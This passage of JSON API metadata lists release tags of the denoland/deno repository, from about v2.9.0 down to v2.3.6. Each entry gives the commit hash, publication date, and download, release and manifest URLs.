s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43de